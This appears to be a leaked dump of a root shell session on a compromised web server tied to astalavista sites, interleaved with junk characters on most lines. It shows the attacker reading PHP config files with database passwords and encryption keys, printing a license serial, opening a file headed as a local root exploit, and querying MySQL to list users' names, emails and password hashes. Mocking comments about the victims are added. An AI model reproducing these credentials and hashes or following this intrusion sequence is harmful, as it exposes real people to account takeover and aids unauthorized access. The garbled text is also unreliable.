drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
2 Y5 \5 C6 d; u8 Xdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail1 Y8 I4 q2 ?& o% b' o
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
. ?$ {0 x$ ?% a/ Z& H  T. nlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 e( q5 D  s  @8 ]# o; p8 @
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow' t  @: p# `4 `9 _5 P# B9 c4 F" r/ G

6 O2 }$ ]* \" _% [sh-3.2# cd auth/. K! O" C9 |, g8 f: M3 ^+ L
sh-3.2# ls -la
7 o$ @! F% ]3 Ntotal 28
0 l# V, g2 j8 q4 C# G6 B! Ldrwxr-xr-x 2 root    root    4096 Dec 23 16:00 .& J0 v7 u; Q' l1 c
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..6 _" X( c6 {) x
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
2 X3 @' m' O, [. W" H-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
1 K8 W+ n$ }' z- F4 R# `- R-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd- z/ H/ w" s# ?. R' I. w7 g4 d  R
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting9 a  O- h, _8 J! N. C
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
! C0 l% r4 h' h/ y1 g# h; b
& D' ~1 M9 j4 Dsh-3.2# cat hackercontest.config.inc.php
/ W& }* C+ L+ `8 b4 [: f/ e<?PHP' ]6 S; d$ ]0 o
// Variabeln f?r Verbindung zur Datenbank //
. n% i) J5 z8 s6 ?$conxHost = ‘localhost’;                       // MySQL hostname
/ J& ^( K2 i7 t0 t) n$conxUser = ‘hackercontest’;                                       // MySQL user
! F9 _/ l) I2 d% S! w% s( f  j$conxPassword = ‘K6m@7dUc’;                    // MySQL password
! _& b0 u* y/ q# }$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish4 I& H2 N' E) u, U% O- r
?>
8 o$ v, s" f; W3 D% dsh-3.2# cat hosting.config.inc.php( `4 M* I/ t5 D
<?PHP' Q) \& D6 W  n& t! w) x
// Variabeln f?r Verbindung zur Datenbank //9 l4 E/ J6 f/ z. w. \, V) f2 ^7 g
$conxHost = ‘localhost’;                       // MySQL hostname
- U7 C8 X. g& g: c0 w, c5 C8 w7 q$conxUser = ‘hostinguser’;                                 // MySQL user
4 @1 f" L0 L$ V; w/ [5 y$conxPassword = ‘cXvB3981′;                    // MySQL password- [$ E+ z  r. d9 E5 x
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish' N/ ?8 O9 ^7 U! z9 x) s4 {
?>, f6 \5 E' Q. u  d, Z9 k
3 d4 G0 z% I$ |4 N6 v
sh-3.2# cd ..
, `2 O2 A& v/ e9 M  p- D; xsh-3.2# cd com; r5 z) K6 i7 d, m  E
sh-3.2# ls -la
0 d9 h: s+ V" K7 Z; }) c* W& [3 ttotal 141208
) _7 E' g4 n4 ?) z- U2 _drwx–x–x 10 com  com       4096 Apr 28 12:40 .
* x7 U, p0 ^. D& D* P. `2 S. j7 Udrwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
2 b! x* B( ?/ \0 edrwx——  2 com  com       4096 Jun  4 04:04 backups
' u0 |5 J7 H- U" ]: x* O2 A-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
1 f( }) r( R5 d, r/ f( xdrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
! _$ n( r* S0 A, M* I" @-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
- R4 r' J1 H( \% P-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout' s$ Z- \+ D6 g% _  W" s
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
2 ^$ u: q( h, F3 g-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
& k; d9 o7 Z. @. U* udrwx–x–x  3 com  com       4096 Jan 29  2008 domains
2 u  h" Y& I3 V& `" P/ }4 J-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
( ^5 H: w3 f+ H% Y8 R. [+ O- _" vdrwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
, O+ j/ K8 U3 A+ n2 S' k-rw——-  1 com  com         69 Nov 18  2008 .lesshst
; ^% P6 O& G9 ^' u' tdrwx——  2 com  com       4096 Sep 24  2007 mail
8 h+ e1 w3 m/ E0 m-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history! I% H6 u8 L2 I9 x/ b3 r
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp* Z8 U# G2 h, [3 z
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
& E/ w9 b# l4 K. E! H# u-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow5 f) W6 [# F6 S/ }" F8 A! b
drwx——  2 com  com       4096 Aug 26  2008 .ssh
9 p; R+ W) P, Z5 `) {0 E8 [-rwx——  1 com  com       8515 Feb 10  2008 t: y; @6 v+ k% F& I5 h
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
8 Q- w, h2 z# d6 \3 P; ?8 ?  idrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp/ |. J- s/ p7 x5 C
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
+ \! U9 d. u1 P1 P4 D  U-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql; j; X$ r: p5 W+ J9 |5 {  `
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
; X$ j$ z- ]! g3 ]6 m0 z-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
* H8 C+ A7 z! [/ y8 ?6 c
% e5 e: d3 U; ?' \sh-3.2# head t.c. t4 d; H8 M9 Q! D9 N2 l2 ]$ |
/*
$ _5 U* H7 e% i9 P* jessica_biel_naked_in_my_bed.c4 L; C) Q4 }9 x8 Y+ t
*# G. `4 @' U" d( N# Y6 b
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura., I: E1 V+ L+ |: L& c7 E( a
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
. ]8 e: `7 s3 Z0 E6 E# i* Stejnak je to stare jak cyp a aj jakesyk rozbite.; f! G. W+ T" N' ^( F
*
9 p: x: l" |. P8 G7 a) {5 ~) K) ]* Linux vmsplice Local Root Exploit- E' j& _4 C8 T- W+ B
* By qaaz
5 B+ N6 Y  ?" n' u, h, [6 l$ @*. H8 f$ A# L+ F- Y8 Q8 Y

: Y: ^/ c/ B* X  n" X" |sh-3.2# cd /
) Y7 r9 E: W* ]' R7 y& w/ D8 |  G% Z, osh-3.2# ls -la
1 r9 E. q" Q/ t4 Y: ototal 360
/ e& u0 _5 |, U4 N$ g1 Ldrwxr-xr-x  25 root root   4096 Jun  3 02:43 .
5 I  ^3 Y5 [, q' M# D& `1 Rdrwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
. |' T1 k8 w; }. O-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
" ?! l8 O: A- u* w  _-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
4 }9 f1 t# w6 H- ?  Q8 p-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db9 U; B* n( V8 `& q, p
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck! S/ C* w) d0 h: V/ c- T  V
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel3 b$ y8 N/ N! k: |" N2 Z& x
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
: i3 k+ {; \4 B) I' kdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
5 J: W; N  D& C1 T- Q5 V+ Odrwxr-xr-x   5 root root   4096 Jun  2 14:06 boot# w' E, L' v* a& T$ f! t
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
' e1 ]% P. b! ^* Qdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc" Y, n/ O6 a* T. K2 t
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
6 U, \0 y5 g+ \0 f  {; }-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf
6 ~6 }& _+ ]+ a0 j6 e  o7 F2 jdrwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
6 h! R. F1 F8 {5 xdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
" K$ v; z+ ?. j: Q% Odrwx——   2 root root  16384 Sep 11  2007 lost+found5 v( f) {  m% o
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media1 H- Q5 |2 c6 S4 {" p4 R
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
7 {, U  H2 e' qdrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
/ |8 O+ d7 |: N9 w6 G* |1 r' A-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg  A$ L2 w! ^+ D. b, V: K9 s! {  X& I
drwxr-xr-x   2 root root      0 Jun  3 02:43 net6 U1 J- l/ X% J( ~! q
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt! {. V! d* h6 K( a8 N& Q7 d- t
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc3 \0 `( w& D( L/ t3 U! j
drwxr-x—  15 root root   4096 Jun  4 08:40 root$ C3 N4 ~3 \, i2 v& L* Q9 D
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin, F* z6 @0 `4 S6 Q$ H0 p
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux* D2 H8 O; E8 l0 k& q( ]
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
0 c( w2 M& `0 z* i: Jdrwxr-xr-x  11 root root      0 Jun  3 02:42 sys4 S. T: h: {+ U( ^' D1 C+ @) D0 J
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
, g* Q( P3 z1 ?7 Q" g( Bdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr% e" l5 {3 \+ J8 r1 O" I5 i7 U
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var0 H& e5 n" }) ^  A8 i# N( P% y

# \* C9 C; E  r- g" W8 S; fsh-3.2# cd opt# |& h/ Y7 P% d* ^/ c
sh-3.2# ls -la
: @" }: R* S6 G, d# j. L( C4 k. Ctotal 20
6 [# v5 p7 ?: o9 O: b& B. r: jdrwxr-xr-x  3 root root 4096 Mar 11 17:56 .9 z2 l' l, ~0 K& n  a0 x0 l, {7 f
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
+ J5 _& F5 e0 V( G; |4 r2 Cdrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
7 s" I" y% a  y0 S& s
/ l$ m6 R& F7 I/ P( |sh-3.2# cd lsws/5 y) ~) E0 Q. ]* Z
sh-3.2# ls -la
/ c5 A6 X1 D0 S1 g" Ltotal 1081 z6 h+ D. X5 L! Q0 q
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
+ ]$ s% j" T) y1 U+ p6 |: C( ydrwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..# i4 |. m8 {  r7 ~; q- d) J
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
+ k+ D" A  O  edrwxr-xr-x 13 root   root    4096 May 29 15:10 admin/ h' t" a$ d. X, k0 w0 h
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
! d2 L* S! K4 u8 S* E5 C$ Edrwxr-xr-x  2 root   root    4096 May 29 15:10 bin. t  O8 R' S* w, G
drwx——  4 apache apache  4096 Jun  3 02:43 conf, x5 d, E( r9 l: m
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT; h: |# p  x- e- o& ^4 b; Y+ ?: G
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
/ q. i# L: z: Y* l/ Edrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
6 c9 m/ p+ s# [% b& Gdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib  O6 N6 E) x: F8 L  |' E
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE# k6 F, d. |1 o8 Y/ u0 {2 ^; G; |
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
+ f( e7 S" @( K# U/ k5 J+ b) P-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
- z& w4 K1 i  s( v-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP! T; J% G! C& f. i( x" Q8 Y
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
0 p. _4 J, n1 m$ g0 w) Pdrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
7 ~; F6 Q0 B: d' ]% m0 ^drwx——  2 apache apache  4096 Mar 20  2008 phpbuild, E. m! o8 B( ?4 M( f' I: u
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share: ^0 i- \4 U) @* i  H
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION5 X  h9 ^- ]; Y; F, p/ C
0 m* M+ f" ~# r9 e+ c! d
sh-3.2# cd conf
- H4 w3 }1 b3 o6 e4 R2 ~0 K$ n, Ysh-3.2# ls -la$ m( t4 J0 v, j. J# z
total 48
; t2 f; ~2 z3 V' Rdrwx——  4 apache apache 4096 Jun  3 02:43 .) ^" j% p; S; I$ A2 v% Z
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
0 v) e+ u$ ]- wdrwx——  2 apache apache 4096 Mar 20  2008 cert7 f2 k2 P" c/ \* B4 J
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
2 R  Q+ n4 A7 V/ T-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak) P' w) w" d% C- g, j
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
) @- P+ d' O- ^3 `, s8 d-rw——-  1 apache apache  256 May 29 15:10 license.key
' L* i/ W6 r, h" {-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
; r3 l' b& o1 u: }# |6 I9 w-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
& B# l! k" h! X- e7 @0 f' x2 g-rw——-  1 apache apache   20 May 29 15:10 serial.no$ [; y+ x% R9 O' n+ p2 O9 f' s
drwx——  2 apache apache 4096 Mar 20  2008 templates, M1 H5 H. L8 U! \
* D9 I( J$ s: E5 V  K5 K, Z& R3 ~  Y. U
sh-3.2# cat serial.no% A/ G2 g' i4 \; ?* y: L
IbDl-oVsO-CKqL-wVRa1 i; ?* p8 x# z; u( A9 l
4 ^7 D) r( w" {0 X' [
sh-3.2# mysql
- p! u4 N9 N  o8 G9 A! y$ o" EWelcome to the MySQL monitor.  Commands end with ; or \g.' t' G2 r6 X' r) z3 S
Your MySQL connection id is 2868442 K- R5 ]; \, b0 a  G- @
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
0 U) N7 b) k' Z4 O0 Z
9 q" R+ v) i. ?- \6 HType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ v  u* j: n7 o+ i
! e! {8 [7 x& @! @0 Jmysql> show databases;- ?- J4 P2 k, Y# E
+———————–+7 h/ F  d) v- o9 M0 V% m, [
| Database              |
! C. T0 h+ }2 G" D  m0 O+———————–+# ?! h' u% q3 c1 E5 m  ]* G
| information_schema    |
( r. A& O2 r9 L2 h| astanet_ads           |* `8 a& ?( e: D2 ?" X
| astanet_mailing_lists |- E/ ?  t1 n) }5 F9 h
| astanet_mediawiki     |2 X+ ~* U- W7 G- o# N8 `
| astanet_membersystem  |
- g" \4 u; c4 J# K| com_contrexx          |
; s7 x) f( |0 z$ D, d3 E* Q4 Z| com_contrexx2         |' S" z) Q" ?9 S, A+ P, ?9 V" C
| com_contrexx2_live    |
$ K: l, g& t4 Y4 ~3 u| da_roundcube          |
1 A& \9 H( _  R| dolphin               |& l% _6 d1 s, J/ r! m* x# E% X
| ideapool              |
% k- N5 Q( ^* G# T5 U- c# m| mysql                 |
1 d2 {. v# J5 [| test                  |3 L7 o5 X) J; d( G# a
| yourmaster            |
; {! z3 F  T# m% S! L2 H( G+———————–+% ~2 i: k1 A4 Q, ?: G' t' O  N
14 rows in set (0.00 sec)
% I4 x0 d& V6 g; O$ ~: G$ l, @/ g& C' v+ h
mysql> use ideapool
, v$ u& U9 a/ i8 J9 f9 r  D+ RDatabase changed
( N( K2 G) Q/ Emysql> show tables;0 A) _7 l0 b! z+ B1 i, k" {
+———————————–+- b8 I5 t4 W( k& b6 c( Q5 Q2 z
| Tables_in_ideapool                |- I9 @6 l8 ?9 u$ s6 `/ I" o  `
+———————————–+
& y4 Y# @  [' e3 ]' d9 h| eventum_columns_to_display        |2 x5 E: `- q5 J9 l
| eventum_custom_field              |
% f* C- b! V( ?: H| eventum_custom_field_option       |9 I7 f) P/ {7 _. f& H1 t+ T
| eventum_custom_filter             |0 ]: B0 f8 c- k. l1 S3 ]
| eventum_customer_account_manager  |
: b* G' S& a- _9 x  l3 i  s| eventum_customer_note             |
9 g' \5 u6 t6 _* [! q| eventum_email_account             |+ L+ Z5 i3 U; w& m% r
| eventum_email_draft               |$ W/ r8 O; g) ]
| eventum_email_draft_recipient     |
3 ?5 q6 V+ F; L. V: w| eventum_email_response            |9 l1 a; S! y* A8 L" _9 y  t* r
| eventum_faq                       |
# T4 u$ S4 H) @; n  c5 ?| eventum_faq_support_level         |
- ^# V' K7 S+ T+ c# f* g6 L# ]1 N- l" G| eventum_group                     |" R! K5 D) O+ f; t7 Q; b
| eventum_history_type              |
* Y+ t- e1 t& l0 _| eventum_irc_notice                |
) e3 U) b* r# Z, ?| eventum_issue                     |
6 t. D/ H' z4 ?) D& s5 K5 n8 N| eventum_issue_association         |  ?+ b: Y+ @( E( D. ?: v6 G* A
| eventum_issue_attachment          |& i1 r* c: E' g; u( c. e
| eventum_issue_attachment_file     |& O+ B+ i+ }: y5 y6 H& e( Z
| eventum_issue_checkin             |0 n( u4 c0 i) T% w
| eventum_issue_custom_field        |
  Z, x5 r4 N3 e5 X  T9 I| eventum_issue_history             |) k3 W1 v' @( K* r" T" d9 V8 v
| eventum_issue_quarantine          |
, v$ \* r3 p- S. \( ]: f- z% l| eventum_issue_requirement         |
1 Q; a( h" o$ _& [4 _| eventum_issue_user                |$ ?3 v3 E5 w3 f' H6 O2 e# v; v2 `
| eventum_issue_user_replier        |: p+ G4 ?9 i- {, O: U' X8 `
| eventum_link_filter               |& [! x2 l8 F) U  ?7 M
| eventum_mail_queue                |- k& n4 F1 _) @& e& [
| eventum_mail_queue_log            |
% H. M/ D$ C  E& e" X| eventum_news                      |# q; U4 _6 W! H; B
| eventum_note                      |: J$ [3 K9 z$ p6 p3 j
| eventum_phone_support             |+ m* O# Y0 }# @4 @( j
| eventum_project                   |% _6 O% @/ R) t. D1 z1 I
| eventum_project_category          |3 R5 V8 U8 M( _$ c
| eventum_project_custom_field      |
  ~4 i3 O$ [: q; v5 B/ k| eventum_project_email_response    |
/ n6 s0 J# x1 _) @| eventum_project_field_display     |
' U+ p+ S& F" t8 ~- M| eventum_project_group             |
+ k2 ?/ _( M) a| eventum_project_link_filter       |+ f% c+ y8 m9 `  _) V
| eventum_project_news              |
1 S" R2 S6 u7 I* {' E8 L| eventum_project_phone_category    |
7 @0 E8 v, \( y, \3 r. t: ?| eventum_project_priority          |
$ R8 K1 B# A( g. n/ q: A/ _. A| eventum_project_release           |. ~2 \+ a2 ]- ~/ Q
| eventum_project_round_robin       |
. J) D9 f9 C! D| eventum_project_status            |* p3 Z7 c0 {9 ]: ^* B+ p7 n) E
| eventum_project_status_date       |
9 g9 k' ?- L5 S" R/ M$ W7 i| eventum_project_user              |( g  I: i5 g/ Y- {- [& R: G
| eventum_reminder_action           |: x, h- t9 l1 N- X2 m
| eventum_reminder_action_list      |7 Y7 |9 }+ ]( J' Q0 {' {! e) f
| eventum_reminder_action_type      |$ F8 b  }. s# I. V4 A
| eventum_reminder_field            |
" E* P2 v( }1 @% S* O8 c| eventum_reminder_history          |5 Z! S8 N& h9 F  d
| eventum_reminder_level            |
4 b- u& i) ]2 _| eventum_reminder_level_condition  |% V7 A3 ], z. o0 L% P) w
| eventum_reminder_operator         |
9 C* q! u; A+ |& s| eventum_reminder_priority         |
* [7 D" T1 b, q| eventum_reminder_requirement      |
) w' E. X8 B: K| eventum_reminder_triggered_action |# y: K. }; ^* ^3 g; ?( ]" Q! b# @
| eventum_resolution                |
6 l" p; `" e" Z% f* ^* `0 E# o0 |% P| eventum_round_robin_user          |' f% w0 E3 T8 p. g8 x/ j( `
| eventum_search_profile            |- Q0 I2 q" W; b- \2 T
| eventum_status                    |$ _' z4 e/ u$ t% @
| eventum_subscription              |: ^- \6 E  @% S; x+ ~8 G
| eventum_subscription_type         |
' M8 t. y) ~2 @9 I& w# A' F| eventum_support_email             |$ T7 o, V+ ?+ x+ ]8 m. F' m
| eventum_support_email_body        |0 [. z- Z6 C; w' d! v: m
| eventum_time_tracking             |
- X0 D6 W( Q! p3 q; O| eventum_time_tracking_category    |
' ~7 D$ ]4 h- @) K+ W| eventum_user                      |
7 O$ ?. ^* K* |: n+———————————–+- ]4 W1 @8 B7 p3 ^4 `2 J4 M* s: y
69 rows in set (0.00 sec)5 \" a: V& O7 O; U
9 |4 a. c/ i6 Q4 [# H
mysql> describe eventum_user;
0 i% J0 m- V) x+ d+ Y& `& s+————————-+——————+——+—–+———————+—————-+2 d; s  j7 O1 m3 w& h+ c6 l2 {
| Field                   | Type             | Null | Key | Default             | Extra          |
0 h6 \. g  O& ~2 i1 y* K9 s+————————-+——————+——+—–+———————+—————-+9 O" m7 A, ?5 K
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |9 _! U* i& f' E+ I- i6 o1 t- M
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
' ?# Q# J$ Y( g* U2 N6 [" ^| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
. z0 z. k0 y$ S& [% }| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |9 R6 g' I+ c1 s# [
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |; s! I( n- e: F
| usr_status              | varchar(8)       | NO   |     | active              |                |7 P& w2 B3 k: X& s
| usr_password            | varchar(32)      | NO   |     |                     |                |
3 U, S9 d( Y; A" k, S| usr_full_name           | varchar(255)     | NO   |     |                     |                |) J  \# }' ]1 H8 G( w5 f
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
5 b: `3 P: f6 \- n- b: @| usr_preferences         | longtext         | YES  |     | NULL                |                |; A8 F/ G( ~/ N
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |# m8 A$ d: g1 j" z2 ~. d! }8 l
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |4 b6 d. K5 H- O; X2 ^
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
! @. R! h. q) U6 i9 s+————————-+——————+——+—–+———————+—————-+- P7 a( k0 S. l% _, f% P& O
13 rows in set (0.00 sec)/ F* j' }0 C) a9 J2 r" I" n) \/ t- |
8 P$ G0 s) d5 U4 n0 M5 A
mysql> select usr_full_name,usr_email,usr_password from eventum_user;9 \5 S2 V" D+ Z8 {7 w9 g+ r
+———————-+——————————-+———————————-+
# [* P) D! a! y! [3 m& l| usr_full_name        | usr_email                     | usr_password                     |9 v& Q! s' G. `9 _- O8 Z4 Y2 \
+———————-+——————————-+———————————-+" s7 c* _- U# e* I9 y0 P
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |# k+ k" C: E$ a/ e( v
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
8 ~' @% ?% P! P- @. Z4 \| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |' r* z7 K+ ^! d9 o  g& }
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
' t+ P: Y- o; m% I, H% `7 \| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |  G- s% g  r8 ^1 ~. J, y- A( _/ ~
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |: n/ B7 w% {  L/ n
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
1 Y- G5 s  v4 R' Q  `* \/ {5 O| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |! p$ U0 d" L. `- J3 [
| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |6 i+ q1 p( e! y. U7 J; g& o
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |' r8 K3 B! c) P( O! x  f1 [
| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |' Y) y9 O% |% \) t
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
* T  |- e) x, |7 x5 D2 o| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
/ w* C0 Q6 y3 J* E8 W8 ^  D0 ^4 ?| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |4 F. _" ?4 ~/ ^' D9 L* l7 T
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |) q0 e( Y/ H! p* I# [: J3 h. N' t
+———————-+——————————-+———————————-+0 P$ a, Z- |/ T: j  B
15 rows in set (0.00 sec)/ u; g# a! P( `+ I

) U) J! r. B  Amysql> select iss_description from eventum_issue where iss_id = 43;
4 I; A" j. s; O9 i+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+, h* C7 h- X, e/ @/ ^
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4 [" m- ]' O: N" A" J9 h/ G" i
|
% ^  d' f6 ]# R2 j+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 B% r; T, e5 |3 I, A8 F% L+ G; W3 e| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be6 t/ }5 v8 ]1 ~5 P$ }8 W
connected for 90 mins… 120mins… so what i propose is something like:
" F. Q; a. D9 E. H1 h, f9 s链接标记[url]http://www.surfthechannel.com/[/url]
; V5 D, ]9 `) M& r: N. S: bsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
* w  O  b0 j  Q* z8 Ylike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t- T6 ?, T; y" ~2 K/ a
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off& ]+ l6 E, l, A  b% Z
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
. [8 ^7 E8 |* E5 V9 z; s3 u: W$ ^* h8 h5 t
We could also put advertisement during play on the flash video player itself… extra $$…
/ H) j6 p+ o( g  h4 V6 U* M0 i$ c! G$ B6 `9 d
By sykadul |
2 P! f. f( |, m* ^: A0 d  h+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ `* t' I9 S- G# {
1 row in set (0.00 sec)
  D' J# A0 V6 e' _6 ^2 W/ r7 y- B9 ~# v( x+ c) c
// Money and extra $$ is all they care about. remember that.
5 R" ~; c4 q3 {
+ p% l  X  T( o2 i" U- Omysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
0 O7 o) ?8 u( ~9 B) Y$ _2 R+————————+——————————————————————————————————————————————————————————————————————————————-+
* s9 u3 p) K5 j& i8 e| iss_summary            | iss_description                                                                                                                                                                                                                          2 Q. C- {. @) \6 @  c. S
|% Z" c; L; Y' h4 @. d
+————————+——————————————————————————————————————————————————————————————————————————————-++ K5 |6 M, p. ?2 \( E0 v
| Forum for REAL EXPERTS | Hello,; X" b3 f% [7 U
. ~9 {0 O8 t: y+ K# D; D1 ^7 _
Ishtus and I,
+ _$ p" A+ w& f/ j. K
9 P$ C$ t1 ?7 aCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide' {0 K2 R& s$ v* W; R
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..; H6 G0 _0 }; |9 h

" z7 ~6 b3 b0 C' wOne example a friend of mine from coresecurity.com!8 ~/ @2 [% Z# \5 o) K9 S

) R" L+ u2 \. DWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..: E* Y" U* y6 f; e- N/ }7 S3 L& h# a( U
1 O# t9 K6 [! R4 y1 ]
|
% L( @3 r3 B4 ?  a9 @+ Z: q+————————+——————————————————————————————————————————————————————————————————————————————+
/ O1 F8 ?3 g6 U0 I( w+ u1 row in set (0.00 sec)
) q% H6 Z/ S0 m6 U1 }) n8 U2 \
( ^  B5 ]9 P7 S! O// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
) O( n- V% ?/ f7 w) w. u- I2 v& r) E3 Z0 E
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
